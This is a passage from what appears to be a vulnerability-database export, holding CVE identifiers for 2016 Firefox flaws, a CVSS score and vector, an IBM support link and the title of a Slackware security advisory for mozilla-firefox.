"CVE-2016-9893", "CVE-2016-9895", "CVE-2016-9897", "CVE-2016-9898", "CVE-2016-9899", "CVE-2016-9900", "CVE-2016-9901", "CVE-2016-9902", "CVE-2016-9904"], "modified": "2018-06-18T00:32:14", "id": "92B1D74FDCFC6F78C1FA2233F8E79DC319437B239B824B381E563E45B66FE14C", "href": "https://www.ibm.com/support/pages/node/696919", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
[slackware-security] mozilla-firefox
